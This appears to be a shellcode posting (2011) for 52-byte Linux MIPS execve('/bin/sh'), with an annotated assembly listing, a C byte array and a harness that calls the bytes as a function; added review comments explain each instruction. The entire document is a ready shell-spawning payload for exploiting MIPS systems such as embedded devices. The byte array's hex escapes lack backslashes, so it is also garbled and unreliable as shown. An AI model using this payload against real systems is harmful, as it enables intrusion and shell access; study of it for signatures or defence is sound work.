# Title : 52 byte Linux MIPS execve
# Published : 2011-10-07
# Author :
#include <stdio.h>
/*
entropy [at] phiral.net
52 byte linux mips shellcode
oh werd
entropy@phiral.mips {~/encode/1/2} cat s.s
# MIPS, GNU as syntax, Linux o32 syscall numbering.
# Builds a two-word argv array { pointer to "/bin/sh", NULL } just below the
# adjusted stack pointer, then issues syscall 4011 with
# a0 = path, a1 = argv, a2 = 0.
# The code locates its own string relative to $ra, so it does not depend on
# the address it is loaded at.
.section .text
.globl __start
.set noreorder                  # keep the written order: the instruction after a branch is its delay slot
__start:
li $a2, 0x666                   # a2 = 0x666 (positive), so the bltzal below is never taken
p: bltzal $a2, p                # not taken, but the "and link" part still sets $ra = p + 8 (the addu $sp line)
slti $a2, $zero, -1             # delay slot: a2 = (0 < -1) = 0, the third syscall argument
addu $sp, $sp, -32              # move sp down 32 bytes
addu $a0, $ra, 4097             # a0 = ra + 4097 ...
addu $a0, $a0, -4065            # ... - 4065 = ra + 32 = address of sc (8 instructions past p + 8);
                                # presumably split in two so neither immediate encodes a zero byte
sw $a0, -24($sp)                # argv[0] = pointer to the path string
sw $zero, -20($sp)              # argv[1] = NULL
addu $a1, $sp, -24              # a1 = &argv[0]
li $v0, 4011                    # syscall number: 4011 is execve in the Linux MIPS o32 table
syscall 0x40404                 # non-zero code field; the C listing shows this word as 01 01 01 0c
sc:
.byte 0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68        # "/bin/sh"; no terminating zero byte is emitted here
entropy@phiral.mips {~/encode/1/2} as s.s -o s.o
entropy@phiral.mips {~/encode/1/2} ld s.o -o s
entropy@phiral.mips {~/encode/1/2} ./s
$ exit
*/
/*
 * Byte image of the assembled routine from the listing in the comment above:
 * eleven 4-byte MIPS instruction words, stored most-significant byte first,
 * followed by the path string. The intended size is 52 bytes
 * (44 + 7 + the string literal's implicit NUL), which matches the title.
 * The implicit NUL is also the only terminator the path string gets; the
 * assembly listing emits none.
 *
 * NOTE(review): as shown here the escapes read "x24x06..." with no backslash,
 * so a compiler sees ordinary text characters rather than the instruction
 * bytes named in the per-line comments. This looks like extraction damage to
 * hex escapes; confirm against the original posting.
 *
 * The image is constant from run to run, so the instruction words and the
 * trailing path string are stable material for a content signature.
 */
char sc[] = {
"x24x06x06x66" /* li a2,1638            a2 = 0x666, positive */
"x04xd0xffxff" /* bltzal a2,4100b4 <p>  never taken; still writes ra */
"x28x06xffxff" /* slti a2,zero,-1       delay slot: a2 = 0 */
"x27xbdxffxe0" /* addiu sp,sp,-32 */
"x27xe4x10x01" /* addiu a0,ra,4097      with the next line: a0 = ra + 32 */
"x24x84xf0x1f" /* addiu a0,a0,-4065 */
"xafxa4xffxe8" /* sw a0,-24(sp)         argv[0] = pointer to the path string */
"xafxa0xffxec" /* sw zero,-20(sp)       argv[1] = NULL */
"x27xa5xffxe8" /* addiu a1,sp,-24       a1 = &argv[0] */
"x24x02x0fxab" /* li v0,4011            syscall number (execve, o32) */
"x01x01x01x0c" /* syscall 0x40404 */
"/bin/sh" /* path string: data, not code. A disassembler renders these bytes as
             sltiu v0,k1,26990 */
/* sltiu s3,k1,26624 */
};
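/*
 * Test harness: prints the size of sc[] and then calls the array as if it
 * were a function taking no arguments and returning nothing.
 *
 * sizeof yields a size_t, so it is printed with %zu; passing it to %d is a
 * type mismatch in a variadic call. The line break at the end of the format
 * string is written as an escape.
 *
 * sc[] is an ordinary initialised data object. Where the platform maps data
 * pages non-executable, the call below faults instead of running the bytes.
 *
 * NOTE(review): `void main` is kept as published; a hosted C program
 * normally declares `int main(void)`.
 */
void
main(void)
{
    void (*s)(void);

    printf("sc size %zu\n", sizeof(sc));

    /* Object-to-function pointer conversion is not defined by ISO C, so the
       cast is spelled out rather than left as an implicit assignment. */
    s = (void (*)(void))sc;
    s();
}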